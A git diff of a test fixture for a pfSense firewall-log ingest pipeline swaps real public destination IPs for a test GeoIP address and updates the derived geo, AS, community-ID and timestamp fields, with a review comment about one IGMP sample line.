diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json
index c643759ad1e..553f5b780cd 100644
--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json
@@ -8,23 +8,25 @@
 },
 "destination": {
 "geo": {
- "continent_name": "Oceania",
- "country_name": "Australia",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": 143.2104,
- "lat": -33.494
+ "lon": 125.3228,
+ "lat": 43.88
 },
- "country_iso_code": "AU"
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 13335,
+ "number": 4837,
 "organization": {
- "name": "Cloudflare, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
- "address": "1.1.1.1",
+ "address": "175.16.199.1",
 "port": 853,
- "ip": "1.1.1.1"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "id": "1535324496"
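Review bot: The IGMP sample `199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,175.16.199.1,datalength=8` replaced a multicast destination (239.255.255.250) with a unicast public address, which is not what an IGMP membership report looks like and removes the only multicast destination from the fixture. Multicast space (224.0.0.0/4) is not in any GeoIP database, so the old value already produced a deterministic result and did not need to move to the supported subset; reverting that one line keeps coverage for whatever the pipeline does with a non-unicast destination without reintroducing the flaky lookup. The ICMP line right after it (142.250.114.105 to 175.16.199.1) is a genuine public address and is fine to change.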
@@ -34,12 +36,12 @@
 "address": "10.170.12.50",
 "ip": "10.170.12.50"
 },
- "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale",
+ "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:sHss/MZhCpIXxOfJoM05khzrJ4k=",
+ "community_id": "1:tVSUn9UzCrzCUQ+t4rluKGR9bZg=",
 "transport": "tcp",
 "type": "ipv4",
 "bytes": 60,
@@ -83,14 +85,14 @@
 },
 "related": {
 "ip": [
- "1.1.1.1",
+ "175.16.199.1",
 "10.170.12.50"
 ]
 },
 "event": {
 "reason": "match",
- "ingested": "2021-09-14T22:09:18.385347616Z",
- "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale",
+ "ingested": "2021-12-09T13:44:35.709404500Z",
+ "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale",
 "provider": "filterlog",
 "timezone": "-04:00",
 "kind": "event",
@@ -113,23 +115,25 @@
 },
 "destination": {
 "geo": {
- "continent_name": "Oceania",
- "country_name": "Australia",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": 143.2104,
- "lat": -33.494
+ "lon": 125.3228,
+ "lat": 43.88
 },
- "country_iso_code": "AU"
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 13335,
+ "number": 4837,
 "organization": {
- "name": "Cloudflare, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
- "address": "1.1.1.1",
+ "address": "175.16.199.1",
 "port": 853,
- "ip": "1.1.1.1"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "id": "1535324496"
@@ -139,12 +143,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Zc3pS1Oh8nfSraLiOoC003TyyeI=", + "community_id": "1:JkXOpAe6IFE5MicGFNlnd7Kt6P8=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -188,14 +192,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385360343Z", - "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709412800Z", + "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", 
@@ -218,26 +222,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-NE", - "city_name": "Lincoln", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Nebraska", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -96.6252, - "lat": 40.8247 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7806, + "number": 4837, "organization": { - "name": "Binary Net, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "216.229.4.66", + "address": "175.16.199.1", "port": 123, - "ip": "216.229.4.66" + "ip": "175.16.199.1" }, "rule": { "id": "1520797901" @@ -247,12 +250,12 @@ "address": "10.170.27.27", "ip": "10.170.27.27" }, - "message": "176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,216.229.4.66,123,123,56", + "message": "176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,175.16.199.1,123,123,56", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:neMw5xCgZIrq6Zpf5yzE3JdxlQg=", + "community_id": "1:lqVApk2FX0H8+Yluuj1CqR83drU=", "transport": "udp", "type": "ipv4", "bytes": 76, @@ -287,14 +290,14 @@ }, "related": { "ip": [ - "216.229.4.66", + "175.16.199.1", "10.170.27.27" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385363355Z", - "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,216.229.4.66,123,123,56", + "ingested": "2021-12-09T13:44:35.709421500Z", + "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,175.16.199.1,123,123,56", "provider": "filterlog", "timezone": "-04:00", "kind": "event", 
@@ -317,23 +320,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -343,12 +348,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Il9QNED3NjnmnpKBFtlZRLG5vf0=", + "community_id": "1:s6BZ2dIpNflL1wK2GOTj03NPi+A=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -392,14 +397,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385365940Z", - "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709427600Z", + "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", 
@@ -422,26 +427,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -451,12 +455,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ILAQmKYNJY6TYv9Cb9BZ0JcVLgw=", + "community_id": "1:wCwVSYNHZmxkcrLYOgGhKzPLN0c=", "transport": "tcp", "type": "ipv4", "bytes": 60, 
@@ -500,14 +504,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385368516Z", - "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709435300Z", + "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -530,26 +534,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" 
@@ -559,12 +562,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:KOUO4DlIIBIJZptxMOvx/CV/TL4=", + "community_id": "1:hU8z0kIzXfY6WDCCq4pzWYAEs8U=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -608,14 +611,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385371102Z", - "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709444Z", + "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -693,7 +696,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385373665Z", + "ingested": "2021-12-09T13:44:35.709450700Z", "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 6,,,1000000105,igb1.27,match,block,in,6,0x00,0xf6279,1,UDP,17,32,fe80::208:9bff:fef3:652b,ff02::1:2,546,547,32", "provider": "filterlog", "timezone": "-04:00", 
@@ -717,23 +720,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -743,12 +748,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Il9QNED3NjnmnpKBFtlZRLG5vf0=", + "community_id": "1:s6BZ2dIpNflL1wK2GOTj03NPi+A=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -792,14 +797,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385376480Z", - "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709457100Z", + "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", 
@@ -822,23 +827,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -848,12 +855,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:WA7YavPXGdzYCQltoA6i6087wdc=", + "community_id": "1:qhIea9mFyhvaUljq3IEFnGaluM8=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -897,14 +904,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385379084Z", - "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709463800Z", + "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", 
@@ -927,26 +934,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -956,12 +962,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:8IslgFYHUjlNL1DU1Mj7Qtxnvsw=", + "community_id": "1:yjMDSnd4M5ZNzvL0NOB1FR4Jjwk=", "transport": "tcp", "type": "ipv4", "bytes": 60, 
@@ -1005,14 +1011,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385381654Z", - "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709469200Z", + "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1035,23 +1041,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1061,12 +1069,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:NUrMaRq0JfKde00qO8PW2llVUx8=", + "community_id": "1:bR7oo0ti5ImuczW3EAgomPxyvPc=", "transport": "tcp", "type": "ipv4", "bytes": 60, 
@@ -1110,14 +1118,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385384183Z", - "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709476400Z", + "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1140,23 +1148,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1166,12 +1176,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:sHss/MZhCpIXxOfJoM05khzrJ4k=", + "community_id": "1:tVSUn9UzCrzCUQ+t4rluKGR9bZg=", "transport": "tcp", "type": "ipv4", "bytes": 60, 
@@ -1215,14 +1225,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385386938Z", - "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709486200Z", + "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1245,23 +1255,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1271,12 +1283,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:xlLE3ZSINevHQXM3p8RQ9KDr+1Q=", + "community_id": "1:rQmykACxQVu8Qt8eiPX4LilGkuQ=", "transport": "tcp", "type": "ipv4", "bytes": 60, 
@@ -1320,14 +1332,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385389503Z", - "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709495100Z", + "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1350,23 +1362,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1376,12 +1390,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:EC0g7QhIlimvv+wydJFXKh3INt4=", + "community_id": "1:zOjPnHE+Tjfyak9LxE+IgjCB5GM=", "transport": "tcp", "type": "ipv4", "bytes": 60, 
